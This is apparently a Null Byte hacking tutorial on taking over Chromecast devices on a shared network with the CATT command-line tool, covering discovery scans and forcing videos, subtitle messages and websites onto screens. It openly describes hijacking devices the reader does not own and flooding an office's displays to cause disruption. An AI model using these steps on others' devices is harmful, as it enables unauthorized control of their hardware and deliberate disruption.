Giving up your Wi-Fi password can be giving up more control than you think. Because of the way Chromecast and other IoT devices communicate, anyone on the same Wi-Fi network as your device can often make it do whatever they want. With a script called "Cast All the Things," we can hijack a Chromecast to play nearly any kind of media with a single command in terminal.
IoT (Internet of Things) devices are notorious for making compromises on security for the sake of convenience, rendering them particularly easy to attack. A perfect example is the Chromecast, which can be effectively hijacked by any device on the same local network that knows how to talk to it.
Media devices like a Chromecast are controlled by simple application programming interfaces (APIs) designed to be controlled by messages from a user's smartphone. These are usually sent to the Chromecast as the user operates a mobile application with an interface for controlling the device. In most cases, these messages don't require any password to execute, so the Chromecast will react precisely the same if you send it commands directly — without involving the official app.
Internet of Things devices are everywhere, and many of them use lightweight messaging standards like MQTT to communicate over Wi-Fi. This standard is kind of like Twitter for Wi-Fi — short, simple pre-formatted messages that can quickly pass between devices in a mesh network. A mesh network allows groups of IoT devices to pass messages between each other so that all devices have a connection to the internet if even one device in the cluster has a connection back to a Wi-Fi network.
- Don't Miss: Take Control of Sonos IoT Devices with Python
While this standard of communication is useful, security is often neglected to make it easier to configure the devices. More serious issues like hard-coded passwords that can't be changed (making botnets a real threat), shortcuts in setting up message authentication, and lack of planning for using devices in shared network environments have made IoT security a real problem.
For everyone wanting a scriptable, easy-to-install, easy-to-work-with way to control Chromecast devices, the community has an answer. Cast All The Things provides command-line access to the Chromecast API, putting you between the front-end mobile application and the device it's controlling. Designed to extend the functionality of the Chromecast much past where Google felt comfortable officially supporting, the project runs on Python and works on nearly every operating system.
CATT's use to a hacker lies in how easy it is to use and how scalable it is. It's not possible to command every Chromecast on a huge network to play a video at the same time using the normal application, because this is not behavior that Google would want to support.
With CATT, a single hacker with a laptop connected to the same network at a large office could order hundreds of Chromecasts to download and play a distracting video at maximum volume simultaneously, causing chaos and confusion at a critical moment.
CATT can also act as an "out of band," or difficult to trace, way to communicate with another person by using the Chromecast as a way to transmit messages. These can either be overt, like in the subtitles, or covert, like changing the programming repeatedly to specific topics.
To follow this guide, you'll need a computer with Python installed. Also, you'll need to be on the same network as the device you are targeting. This can be a Wi-Fi network or an Ethernet network. It will not work on a guest network if the guest network doesn't allow you to scan or communicate with other hosts, like on a Starbucks Wi-Fi network.
You'll also need a Chromecast device to try to control, such as a Chromecast Ultra or Chromecast (3rd Generation). CATT will work against all models of Chromecast, as they use the same basic API calls. Once you have a Chromecast device connected to the same network as your computer, you can download CATT and any dependencies.
Installing CATT is incredibly easy, provided you have Python installed. If you do, then simply run the following command in a terminal window. While you don't need to, you should also take some time to check out the GitHub page if you want to learn more about how the tool works.
~# pip install catt Collecting catt Downloading catt-0.10.3-py2.py3-none-any.whl (24 kB) Requirement already satisfied: requests>=2.18.4 in /usr/lib/python3/dist-packages (from catt) (2.21.0) Collecting youtube-dl>=2019.01.24 Downloading youtube_dl-2020.2.16-py2.py3-none-any.whl (1.8 MB) |████████████████████████████████| 1.8 MB 1.6 MB/s Requirement already satisfied: Click>=5.0 in /usr/lib/python3/dist-packages (from catt) (7.0) Collecting PyChromecast>=4.1.1 Downloading PyChromecast-4.1.1-py2.py3-none-any.whl (50 kB) |████████████████████████████████| 50 kB 7.8 MB/s Collecting ifaddr>=0.1.4 Downloading ifaddr-0.1.6.tar.gz (6.5 kB) Collecting zeroconf>=0.17.7 Downloading zeroconf-0.24.4-py3-none-any.whl (56 kB) |████████████████████████████████| 56 kB 4.3 MB/s Collecting protobuf>=3.0.0 Downloading protobuf-3.11.3-cp37-cp37m-manylinux1_x86_64.whl (1.3 MB) |████████████████████████████████| 1.3 MB 5.5 MB/s Collecting casttube>=0.2.0 Downloading casttube-0.2.0-py3-none-any.whl (4.2 kB) Requirement already satisfied: six>=1.9 in /usr/lib/python3/dist-packages (from protobuf>=3.0.0->PyChromecast>=4.1.1->catt) (1.12.0) Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from protobuf>=3.0.0->PyChromecast>=4.1.1->catt) (40.8.0) Building wheels for collected packages: ifaddr Building wheel for ifaddr (setup.py) ... done Created wheel for ifaddr: filename=ifaddr-0.1.6-py3-none-any.whl size=9403 sha256=c0678af91fe00e2952d79f3c704fe5a5d9598563de5250be4671d Stored in directory: /root/.cache/pip/wheels/b2/b4/e4/5be102e12e0ab70c7b9a16744a529c698a00df5ac3443 Successfully built ifaddr Installing collected packages: youtube-dl, ifaddr, zeroconf, protobuf, casttube, PyChromecast, catt Successfully installed PyChromecast-4.1.1 casttube-0.2.0 catt-0.10.3 ifaddr-0.1.6 protobuf-3.11.3 youtube-dl-2020.2.16 zeroconf-0.24.4
Pip will install all dependencies and configure CATT for you. After it's done installing, you can type catt --help to get a list of all the command-line tools to better understand what the script can do. Sadly, there is no manual entry for CATT, so the amusing man catt command currently goes nowhere.
~# catt --help Usage: catt [OPTIONS] COMMAND [ARGS]... Options: --delete-cache Empty the Chromecast discovery cache. -d, --device NAME Select Chromecast device. --help Show this message and exit. Commands: add Add a video to the queue. cast Send a video to a Chromecast for playing. cast_site Cast any website to a Chromecast. ffwd Fastforward a video by TIME duration. info Show complete information about the currently-playing video. pause Pause a video. play Resume a video after it has been paused. restore Return Chromecast to saved state. rewind Rewind a video by TIME duration. save Save the current state of the Chromecast for later use. scan Scan the local network and show all Chromecasts and their IPs. seek Seek the video to TIME position. skip Skip to next video in queue (if any). status Show some information about the currently-playing video. stop Stop playing. volume Set the volume to LVL [0-100]. volumedown Turn down volume by a DELTA increment. volumeup Turn up volume by a DELTA increment. write_config Write the name of default Chromecast device to config file.
Tip: Some of you may get a warning that "This program requires Python 3 and above to run," even though you do have Python3 or higher. If that's you, try python3 -m pip install catt to install CATT and go from there. Alternatively, you could try apt install python3-pip followed by pip3 install catt to get it working.
CATT makes things immediately easy for us by being able to scan the network on its own. While it's possible to do an Nmap scan against the network, the scan feature of CATT is already tuned to detect Chromecast devices on the local network.
Without using CATT, you'll need to calculate the network range of the network you're on, scan for devices with port 8008 open, and then tease out details about what type of device it is. All of these things are integrated into CATT, so to discover all nearby Chromecasts, you can type the following command. (To see how it would work with Nmap, check out our video.)
~# catt scan Scanning Chromecasts... 192.168.0.91 - Probe Team CIC - Google Inc. Chromecast Ultra
Here, CATT has found a device and shown us its IP address, network name, and the type of device it is. We can use this IP address, or the name of the device, to specify which device we want to command if there are more than one.
Because there is only one on this network, we don't need to specify it in the following commands, because CATT will send to it by default.
Images like GIFs are effortless to display on a Chromecast display. To display most common formats of images, including animated GIFs (which will play in a loop), you can run the following command.
~# catt cast ./mygif.gif Casting local file /Users/skickar/Desktop/mygif.gif... Playing mygif.gif on "Probe Team CIC"... Serving local file, press Ctrl+C when done. 192.168.0.91 - - [21/Feb/2020 05:34:45] "GET /?loaded_from_catt HTTP/1.1" 200 - image/gif - 5.98 MB
To cast a video hosted on a YouTube-like website, you can run the following command.
~# catt cast "https://www.youtube.com/watch?v=dQw4w9WgXcQ" Casting remote file https://www.youtube.com/watch?v=dQw4w9WgXcQ... Playing Rick Astley - Never Gonna Give You Up (Video) on "Probe Team CIC"...
The tool supports many, many websites besides YouTube that have video content, and there is a full list of popular video sites that CATT can support (several of which are quite nasty).
With the casting ability, you can either host your own videos you want to play on YouTube and play them with the script or you can actually stream a file directly from your computer. To stop or pause the video, you can simply say:
~# catt stop ~# catt pause
Or you can add videos to the queue with:
~# catt add "https://www.youtube.com/watch?v=ZFq9lTiWUo4"
Check the help file for more cool things you can do with videos.
Now, let's overlay a message on the media we're casting from our laptop. By doing so, we'll be able to communicate on two layers: with the content of the video we are playing, and with subtitles played very visibly over the video as it plays.
We'll need to make an SRT (SubRip Text) file, a popular subtitle text file format, which we can do in nano. In a terminal window, type the following to create a subtitles file.
~# nano Demo.srt
Then, paste the following into the text file. You can modify the text, but the point is seeing how the format works. On the top, you have a 0 for where everything starts. Then you have a number for each block of text, a time code for how long the text is displayed, and then the text to display under it.
0 00:00:01.530 --> 00:00:03.629 HERE IS SOME TEXT 1 00:00:03.629 --> 00:00:07.819 OH WOW LOOK AT THAT BIG TEXT 2 00:00:07.819 --> 00:00:08.740 IT IS SO HUGE AND BIG OH 3 00:00:08.740 --> 00:00:13.370 SOME MORE SAMPLE TEXT HERE BUT 4 00:00:13.370 --> 00:00:14.660 there is no need to shout 5 00:00:14.660 --> 00:00:17.699 Never use Priceline 6 00:00:17.699 --> 00:00:22.720 More text to test 7 00:00:22.720 --> 00:00:26.300 Here is some sample text 8 00:00:26.300 --> 00:00:30.000 please pay me with a credit card
When you're done creating your text file, type Control-X, then Y, and Enter to save and close.
Now, we should have a Demo.srt file to cast along with a local video. It's easy to cast a local video; simply specify the file path after typing catt cast and you should see the video begin to play. To specify we want subtitles, we'll add the -s flag. In the format below, substitute "/yourvideo.mp4" with the location of your video file.
~# catt cast -s ./Demo.srt ./yourvideo.mp4 Casting local file yourvideo.mp4... Using subtitle /Users/skickar/Desktop/Demo.srt Playing yourvideo.mp4 on "Probe Team CIC"... Serving local file, press Ctrl+C when done. 192.168.0.91 - - [21/Feb/2020 05:44:45] "GET /?loaded_from_catt HTTP/1.1" 200 - video/mp4 - 786.90 MB 192.168.0.91 - - [21/Feb/2020 05:44:45] "GET //var/folders/n1/l_2ynlx91lv57t122lq8lkyh0000gn/T/tmpxxljn3ds.vtt HTTP/1.1" 200 - text/vtt;charset=utf-8 - 1.69 KB
Just like that, you should see your video and subtitle message begin to play! I changed my example text a bit before it played.
If you want to spend less time specifying different Chromecast devices, you can also set up aliases and add a configuration file. You can create a configuration file by creating a "catt.cfg" file at the following location.
~# nano ~/.config/catt/catt.cfg
You can add devices to the configuration in the following format. Under "options," you can add the default device you wish to use if you don't specify a device otherwise when running Catt. Under "aliases," you can make nicknames for the devices you want to use so that you can use that name for them when running the script.
[options] device = chromecast_one [aliases] one = chromecast_one two = chromecast_two
Type Control-X, then Y, and Enter to save and close.
Lastly, we can cast any website directly to the screen. The Chromecast will grab sites with a resolution of 1280 x 720 pixels and display them on the screen. While this is useful for casting existing websites, we can also use it to design our own content, put it in a web interface, and then just cast that to the screen!
Sometimes we might want to create something fake and splash it on the screen, and by putting up a web URL, we can even host a web server on our own laptop and cast whatever we choose to display on it directly to the interface.
The command to do so, with our example being the Null Byte homepage, is as follows:
~# catt cast_site https://null-byte.wonderhowto.com Casting https://null-byte.wonderhowto.com on "Probe Team CIC"...
This tool is useful for a hacker looking to control Chromecast devices they don't own, but it's beneficial to anyone who does own a Chromecast as well. Thanks to the simplicity of managing Chromecast devices over Wi-Fi, you can set custom triggers to cause actions on any displays you want using CATT.
While the techniques we covered today were focused on local networks, this will also work against any Chromecast device that's exposed directly to the internet as well. This was demonstrated when hackers found Chromecast devices on Shodan and made them play videos promoting PewDiePie. You should never do this, so if you've set up port forwarding to allow direct access to Internet of Things devices like a printer, camera, or media player, you can expect a message from a hacker telling you to subscribe to PewDiePie.
I hope you enjoyed this guide to finding and taking over Chromecast devices! If you have any questions about this tutorial on taking over IoT devices or if you have a comment, feel free to ask it below or reach out to me on Twitter @KodyKinzie.
Want to start making money as a white hat hacker? Jump-start your hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from cybersecurity professionals.
Other worthwhile deals to check out: